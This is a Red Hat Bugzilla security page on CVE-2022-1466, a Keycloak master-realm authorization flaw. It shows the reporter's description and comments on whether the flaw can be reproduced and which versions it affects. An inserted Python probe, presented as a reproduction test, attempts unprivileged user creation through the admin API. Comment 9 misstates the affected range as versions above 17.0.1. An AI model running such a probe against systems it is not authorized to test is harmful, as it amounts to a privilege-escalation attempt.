Bug 2050228 (CVE-2022-1466)

Summary: CVE-2022-1466 keycloak: Improper authorization for master realm
Product: [Other] Security Response
Reporter: Pedro Sampaio <psampaio>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG
QA Contact:
Severity: medium
Docs Contact:
Priority: medium
Version: unspecified
CC: aboyko, aileenc, ajaiswal595, alazarot, anstephe, arulanandhaguru.i, avibelli, bgeorges, bibryam, boliveir, chazlett, cmoulliard, dkreling, drieden, emingora, etirelli, ggaughan, gmalinko, hbraun, ibek, ikanello, janstey, jochrist, jrokos, jstastny, jwon, krathod, kverlaen, lthon, mnovotny, mszynkie, pantinor, pdelbell, pdrozd, peholase, pgallagh, pjindal, rguimara, rrajasek, rruss, security-response-team, sthorger, tero.saarni, tzimanyi
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version: keycloak 17.0.1
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in Keycloak. Red Hat Single Sign-On allowed authenticated users to perform actions outside their permissions. This flaw makes it possible to add users to the master realm even though no corresponding permission was granted.
Story Points: ---
Clone Of:
Environment:
Last Closed: 2022-04-12 12:47:37 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On:
Bug Blocks: 2031181, 2078615

Description Pedro Sampaio 2022-02-03 13:51:05 UTC
Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions that they should not be allowed to perform. It was possible to add users to the master realm even though no respective permission was granted.

References:

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt
https://www.syss.de/pentest-blog/fehlerhafte-autorisierung-bei-red-hat-single-sign-on-750ga-syss-2021-076

Comment 2 Bruno Oliveira 2022-04-08 20:12:05 UTC
I would like to know more details about this issue, like:

- Are those users performing actions that they should not be allowed present on the master realm?
- If they are present on the master realm, which roles are assigned to them? Do they have any client roles?
- Would it be possible to have the screenshots from the "Role Mappings" tab for the user who managed to escalate those privileges?

Comment 4 Bruno Oliveira 2022-04-11 23:18:39 UTC
I had a great chat with Patrick, and we identified that the issue is no longer present on the latest releases of RH-SSO and Keycloak. 

Thank you for your collaboration!

Comment 7 Tero Saarni 2022-05-06 10:15:04 UTC
I cannot find proper information on affected Keycloak versions.  I would like to request for clarification.

* The CVE https://access.redhat.com/security/cve/cve-2022-1466 mentions Keycloak but it does not mention affected Keycloak versions 
* The CVE in NVD only mentions Red Hat Single Sign-On and not Keycloak https://nvd.nist.gov/vuln/detail/CVE-2022-1466
* This bugzilla issue is the only place with version information "Fixed In Version: keycloak 17.0.1" but this issue was resolved with "NOTABUG"
* None of the github security advisories mentions CVE-2022-1466 https://github.com/keycloak/keycloak/security/advisories
* I tried to reproduce the fault with various Keycloak versions backing all the way to Keycloak 12.0.0 by following the details given in disclosure document https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt but I could not reproduce it.

Please, would you clarify the affected Keycloak versions?

Thank you for your help!

Comment 8 Tero Saarni 2022-05-06 11:14:40 UTC
Sorry, I forgot to mention also that Keycloak 17.0.1 release notes do not mention anything that sounds like this bug, or fixes to security vulnerabilities in general https://www.keycloak.org/2022/03/keycloak-1701-released
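The reproduction attempt described in comment 7 can be scripted against a test instance. The following is an added example written for this bug page, not code from Red Hat, SySS or the Keycloak project: it logs in as an account that has been granted no user-management role, tries to create a user in the master realm through the admin REST API, and then confirms the outcome through the user listing endpoint instead of trusting the first status code alone. Assumptions not taken from the report: the Keycloak 17+ URL layout without the legacy "/auth" prefix (set BASE_URL to ".../auth" for WildFly-based releases), the built-in public client "admin-cli" with the password grant enabled (as kcadm.sh uses it), and placeholder credentials for a throwaway low-privilege account you created yourself. The transport is injectable so the logic can be exercised offline.

```python
"""Probe whether an unprivileged Keycloak account can create users in the master realm.

Added example for the bug page, not project code. A correctly authorizing
server answers 403 to the create call and the probe user never appears.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

# Assumed, not from the bug report: Keycloak 17+ layout (no "/auth" prefix).
BASE_URL = "http://localhost:8080"
CLIENT_ID = "admin-cli"  # built-in public client used by kcadm.sh


def urllib_transport(method, url, headers, body):
    """Default transport: (method, url, headers, body bytes|None) -> (status, text)."""
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def get_token(transport, base_url, login_realm, username, password):
    """Resource-owner password grant against the realm the test account lives in."""
    form = urllib.parse.urlencode({
        "grant_type": "password", "client_id": CLIENT_ID,
        "username": username, "password": password,
    }).encode()
    status, text = transport(
        "POST", f"{base_url}/realms/{login_realm}/protocol/openid-connect/token",
        {"Content-Type": "application/x-www-form-urlencoded"}, form)
    if status != 200:
        return None
    return json.loads(text).get("access_token")


def probe_master_user_create(transport, base_url, login_realm, username,
                             password, probe_username):
    """Return a dict describing what the account could do in the master realm."""
    token = get_token(transport, base_url, login_realm, username, password)
    if token is None:
        return {"verdict": "no-token", "created": None, "visible": None}
    auth = {"Authorization": f"Bearer {token}"}

    # Step 1: try to create a user in master; HTTP 201 means the server accepted it.
    create_status, _ = transport(
        "POST", f"{base_url}/admin/realms/master/users",
        {**auth, "Content-Type": "application/json"},
        json.dumps({"username": probe_username, "enabled": True}).encode())

    # Step 2: confirm independently via the listing endpoint, because a proxy or
    # custom error page could mask the real outcome of step 1. An account with no
    # view-users role will usually get 403 here, which is recorded as "unknown".
    list_status, list_text = transport(
        "GET",
        f"{base_url}/admin/realms/master/users?"
        + urllib.parse.urlencode({"username": probe_username}),
        auth, None)
    visible = None
    if list_status == 200 and list_text:
        visible = any(u.get("username") == probe_username
                      for u in json.loads(list_text))

    created = create_status == 201
    if created or visible:
        verdict = "REPRODUCED: unprivileged account added a master-realm user"
    elif create_status in (401, 403) and not visible:
        verdict = "not reproducible: authorization enforced"
    else:
        verdict = f"inconclusive (create HTTP {create_status}, list HTTP {list_status})"
    return {"verdict": verdict, "created": created, "visible": visible,
            "create_status": create_status, "list_status": list_status}


if __name__ == "__main__":
    # Placeholder credentials for a deliberately unprivileged account on a test
    # instance you control; do not run this against servers you do not own.
    print(probe_master_user_create(urllib_transport, BASE_URL, "master",
                                   "lowpriv", "lowpriv-password",
                                   "cve-2022-1466-probe"))
```

Run it once before and once after an upgrade; a "REPRODUCED" verdict on any version is the evidence the thread is missing, and a clean 403 with no visible user is what comment 7 observed back to 12.0.0. Delete the probe user afterwards if it was created.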

Comment 9 arulguru 2022-05-06 13:15:12 UTC
(In reply to Tero Saarni from comment #7)
> I cannot find proper information on affected Keycloak versions.  I would
> like to request for clarification.
> 
> * The CVE https://access.redhat.com/security/cve/cve-2022-1466 mentions
> Keycloak but it does not mention affected Keycloak versions 
> * The CVE in NVD only mentions Red Hat Single Sign-On and not Keycloak
> https://nvd.nist.gov/vuln/detail/CVE-2022-1466
> * This bugzilla issue is the only place with version information "Fixed In
> Version: keycloak 17.0.1" but this issue was resolved with "NOTABUG"
> * None of the github security advisories mentions CVE-2022-1466
> https://github.com/keycloak/keycloak/security/advisories
> * I tried to reproduce the fault with various Keycloak versions backing all
> the way to Keycloak 12.0.0 by following the details given in disclosure
> document
> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-
> 076.txt but I could not reproduce it.
> 
> Please, would you clarify the affected Keycloak versions?
> 
> Thank you for your help!

The issue wasn't reproducible when I tried either, but I found CVE-2022-1466 in the GitHub advisory DB where it says every version >17.0.1 is affected.
https://github.com/advisories/GHSA-f32v-vf79-p29q

Comment 10 Tero Saarni 2022-05-06 13:35:27 UTC
Interesting.  That github advisory is for maven package keycloak-core, so likely it comes from maven central where every keycloak-core package prior to 17.0.1 is now flagged with CVE-2022-1466, for example https://mvnrepository.com/artifact/org.keycloak/keycloak-core/16.1.1.  Since the github advisory was created on Apr 27 and the version information "Fixed In Version: keycloak 17.0.1" in this bugzilla issue was added on Apr 25, I guess this issue is the source.

Comment 11 ajaiswal595 2022-06-21 14:02:34 UTC
@security-response-team

If we have not enabled SSO, are we still vulnerable to these two CVEs, CVE-2022-1466 and CVE-2022-1245?